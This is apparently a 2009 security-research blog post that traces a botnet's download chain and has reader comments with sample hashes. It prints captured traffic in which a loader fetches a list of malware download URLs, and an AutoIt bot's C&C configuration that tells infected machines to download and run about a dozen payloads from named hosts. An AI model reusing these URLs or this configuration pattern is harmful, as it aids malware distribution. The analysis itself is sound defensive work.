Blog

BotnetWeb – Part 2

The security industry is waiting eagerly for Finjan to release more technical details about their recent discovery of a multi-million sized botnet.  I got a chance to speak with Fijan's representatives at RSA on April 23rd.  I asked them about this new un-named / un-identified botnet, Unlucky me, Finjan couldn't give any more information, saying that currently they are working with law enforcement agencies so they are not in a position to talk more on this right now.

This did not stop me from carrying my investigation further.  I need to assess the severity of this threat myself and have to make sure that our customers are protected against this particular threat.  As far as I'm concerned, it's not cops or other law enforcement agencies that will protect those poor 1.9 million victims, its the job of the security industry.  The challenge in front me was that Finjan did not disclose any clear information which could lead other security researchers to the true identity of this un-named botnet.

There were a few hints in the Finjan report which could be used to explore some hidden aspects of this botnet.  The first hint was that this botnet had been seen to download Hexzone around March 29. I have covered Hexzone in detail in a previous article.  ESET has also come up with a very good write-up about Hexzone here. The second hint was the joebox analysis report.  This report showed a list of additional malware components downloaded by the un-named botnet. 

For a quick re-cap, here is the first GET request as mentioned in the Finjan report:

GET /ploads/eula.exe HTTP/1.1

followed by

GET /ldr/loadlist.php?version=1 HTTP/1.1

A quick look into my sandnet data identified eula.exe as Trojan.VBInject  which itself is a known generic downloader.

Here is a traffic snippet from my sandnet data:

GET /ldr/loadList.php?version=1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 76.73.21.186
Connection: Keep-Alive
HTTP/1.1 200 OK

Date: Mon, 09 Feb 2009 06:22:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 115
Connection: close
Content-Type: text/html

http://76.73.21.186/ldr/dl/zchMiB.exe
http://76.73.21.186/ldr/dl/part.exe
http://76.73.21.186/ldr/dl/minisvr4.exe

VBinject reads malware links from the HTTP response and installs them on the infected machine.  These downloads are also visible in Finjan's download report.  My next step was to traverse through all of my sandnet data in an attempt to find out how many malware samples have been seen downloading Trojan.VBInject. As expected, the results were quite interesting.

According to my limited sandnet data there were only two malware samples that ever downloaded Trojan.VBInject. One was Virus.Virut and the other was Trojan.Autoit. I have covered Virut in detail in a previous article where I described it as one of the biggest BotnetWebs, responsible for downloading lots of the other big botnets.  Is Virut the 1.9 million host botnet?  My guess is no.  Virut always relied on Trojan.Injector (another big malware download service) to download further components but in this case the VBInject download link was found to be hard coded into the Virut binary.  This is not the characteristics of a generic downloader/botnet which downloaded VBInject as the result of a botmaster command.

Here is a traffic snippet from that Virut sample while downloading Trojan.VbInject

Virut_vbinject  

So we are only left with Trojan.Autoit. Trojan.Autoit is a powerful malware download service and according to my data, it has been seen downloading both Hexzone and VBInject.  A perfect match, isn't it?

GET /0/x.php?hid=531e237606675012bef96b4bef939b8d&mhid=bd1de70c62b17015b639adb2d30f0f0b&version=7&name=Codec_v.1004.1.exe&os=WIN_XP&_=262604330120091 HTTP/1.1

User-Agent: AutoIt v3
Host: www.ophywmntzrtew.info
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Sun, 22 Mar 2009 08:17:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 750
Content-Type: text/html

[version]
version=16
update=http://reopsakwww.com/1/stubv16.exe

[fetch]
delay=20000

[ads]
delay=40
url=
[download_onconnect]

im000.exe=http://reopsakwww.com/up/im.exe

exer000.exe=http://reopsakwww.com/up/exer.exe

[download_once]

avimu000.exe=http://reopsakwww.com/up/avimu.exe
icv002.exe=http://reopsakwww.com/up/icv.exe
ppack000.exe=http://cn.king.cd/hk.exe

seo004.exe=http://reopsakwww.com/up/seo.exe
red000.exe=http://www.plumsauce.info/RED.exe
wr011.exe=http://reopsakwww.com/up/wr.exe
ndlcpt001.exe=http://76.73.62.2/ploads/dlcpt.exe
prox000.exe=http://reopsakwww.com/1/proxy.exe
icc1001.exe=http://reopsakwww.com/up/icc1.exe
icc2001.exe=http://reopsakwww.com/up/icc2.exe
luxe000.exe=http://reopsakwww.com/up/luxe.exe
1496a000.exe=http://reopsakwww.com/up/1496a.exe

As one can see, there are multiple instructions in the HTTP response which instruct Autoit to download and install additional malware components.

The URL mentioned under [version] is the updated version of VBInject itself.

The URLS under [download_onconnect] are downloaded each time VBInject connects to its CnC, where as the [download_once] urls are downloaded only once.

Is Autoit the botnet discovered by Finjan?  There is only one problem, according to Finjan the botnet CnCs were located in Ukrain, and the Autoit sample I analyzed was talking to www.ophywmntzrtew.info which is hosted in Malaysia.

address:      PIRADIUS NET
address:      Unit 21-3A, Level 21
address:      Plaza DNP 59, Jalan Abdullah Tahir
address:      Taman Century Garden
address:      80300 Johor Bahru, Johor
address:      Malaysia
phone:        +607 334 8605
fax-no:       +607 334 8605
country:      MY
changed:       20071003
mnt-by:       MAINT-MY-PIRADIUS
source:       APNIC

It looks as though all my efforts to track down the unknown botnet were fruitless.  I am still unsure.  On the bright side, in this process I managed to explore few new BotnetWebs and got a chance to verify the BotnetWeb concept based on data from other security vendors like Finjan.

I will try to cover Autoit in detail in my next article, for the time being let's just say Autoit is a BotnetWeb downloading second stage malware as shown below:

1. http://reopsakwww.com/1/stubv16.exe

Updated version of Autoit itself.

http://www.virustotal.com/analisis/8a8654fd12f28750120afa7fc46d3ac5

2. http://reopsakwww.com/up/im.exe

A Trojan which spreads through IM based social engineering.

http://www.virustotal.com/analisis/1278b779066e2c7d7007ccd161658486

These are the binaries mentioned under download_once, so there is a good chance that these are pay-per-install malware not owned by the actual botmasters.

4. http://reopsakwww.com/up/avimu.exe

AVs are confused on this, so am I.  Nothing can be said about it without a detailed analysis. I'll try to cover it in some future post.

http://www.virustotal.com/analisis/4b4f54d4d6a03f7930314f9e50c59fbb

5. http://reopsakwww.com/up/icv.exe

A famous backdoor and downloader know as TDSS.

http://www.virustotal.com/analisis/80bd8872089da6eae06957d579ee3cf4

6. http://cn.king.cd/hk.exe

IRC.SDbot, a famous IRC Bot.

http://www.virustotal.com/analisis/6f5704db0c301ac5752bf2e03e99b797

7. http://reopsakwww.com/up/seo.exe

Most AVs are calling this Trojan-Dropper.Win32.Wlord. Nothing detailed from my side right now.

http://www.virustotal.com/analisis/f75e5ef4f909865b82db901052107577

8. http://www.plumsauce.info/RED.exe

No great intel from my side at this moment, most AVS are calling it a downloader.

http://www.virustotal.com/analisis/f5b21231615f89aec50cb6235bce6c73

9. http://reopsakwww.com/up/wr.exe

A trojan/downlaoder , often seen downloading Rogue AVs.

http://www.virustotal.com/analisis/feacd3f71d1fca8b06e57b6e61fa4e36

10. http://76.73.62.2/ploads/dlcpt.exe

Trojan.VBInject.  It's discussed in detail in the beginning of this article.

http://www.virustotal.com/analisis/df3c929bab0975e1560fc85d76bb13cd

11. http://reopsakwww.com/1/proxy.exe

http://www.virustotal.com/analisis/7a8495c069ac220a32fd865e43c3c0fd

12. http://reopsakwww.com/up/icc1.exe

Trojan.Piptea, another powerful malware downloader.

http://www.virustotal.com/analisis/ede6257379f870edc572d33f58c0a3ca

13. http://reopsakwww.com/up/icc2.exe

http://www.virustotal.com/analisis/8275470c7c5b22e51c03fdf1c01f4748

14. http://reopsakwww.com/up/luxe.exe

Vundo a.k.a. Virtumonde.

http://www.virustotal.com/analisis/1552d5d75f2dc9fefa112e4afc14a34d

15. http://reopsakwww.com/up/1496a.exe

A generic downloader.

http://www.virustotal.com/analisis/8aa617bf286b02228b270c58c6dc3f46

The end picture is quite miserable.  Autoit downloaded dozens of other malware components including some of the most power mawlare downloaders like Virut and Trojan.VBInject  which further downloaded more malware components.  Here I try to plot all these downloads in a graphical form to make it easier to visualize.

Autoit

Here is the Virut graph from my earlier post. Lets integrate it with the Autoit graph and see how the combined graph looks.

Autoit_virut

One can easily sense the level of cooperation these malware master minds must offer each other.  Maybe it's time for us in the security industry to come closer and show the same level of cooperation. As I always say, there are plenty of bad guys out there to keep us (the good guys) in business :).

Atif Mushtaq @ FireEye Malware Intelligence Lab

Question/Comments : research SHIFT-2 fireeye DOT COM

4 thoughts on “BotnetWeb – Part 2

  1. FYI, PIRADIUS has popped up several times in my investigations of RBN and Russkrainian cyber crime, so while it is not physically located in The Ukraine, you can bet that the post-RBN Russkrainian criminals involved in this have used PIRADIUS fro several years now.
    - ferg

  2. Found these samples on a customers notebook. The .exe appeared in temp on 12.04. and 13.04. (probably via some porn-site) and are not detected by all AVs I tried.
    The 490700….dll was found at various places in ../Macromedia/Common/ like SilentBanker and was started via RUN and audio-drivers.
    The .drv was found in system32 (60kb larger than original), also not detected by all AVs I tried. The wua…dll was there as well, but is detected by some AVs.
    Could be tracks of a botnetweb-install. ………………..
    Keep your good work!

  3. Here some more details for readers to one of the mentioned .exe, filename was 21ebbf888a25337e.exe
    http://www.threatexpert.com/report.aspx?md5=b30dec0ec2b496d772b457435f3180c6
    * Submission details:
    o Submission received: 29 April 2009, 05:50:59
    o Processing time: 6 min 17 sec
    o Submitted sample:
    + File MD5: 0xB30DEC0EC2B496D772B457435F3180C6
    + File SHA-1: 0x624324E5726AC51074362B5E7A0751E9B75CDD3B
    + Filesize: 91,136 bytes
    * The following files were created in the system:
    # Filename(s) File Size File Hash
    1 %Windir%\msacm32.drv 89,088 bytes MD5: 0xA70F58DCC4EF5970F080326DE6A69749
    SHA-1: 0x2DD8EA11FEC0EAC399D264043A5C9AACF5A303B0
    2 [file and pathname of the sample #1] 91,136 bytes MD5: 0xB30DEC0EC2B496D772B457435F3180C6
    SHA-1: 0x624324E5726AC51074362B5E7A0751E9B75CDD3B
    3 %Windir%\wuasirvy.dll 106 bytes MD5: 0xD610CE7D88980283BA5ECA0E15CA6EC9
    SHA-1: 0x4D9238D44DE7E4CA34C33FACA6A1316EF140E30F
    Rescan a few minutes ago:
    http://www.virustotal.com/analisis/22557c86f56262fc523778891b023a53
    File 21ebbf888a25337e.exe received on 04.29.2009 22:55:58 (CET)
    Current status: finished
    Result: 0/40 (0%)

  4. keep up the good work guys, i can’t wait to see more of these articles.

Comments are closed.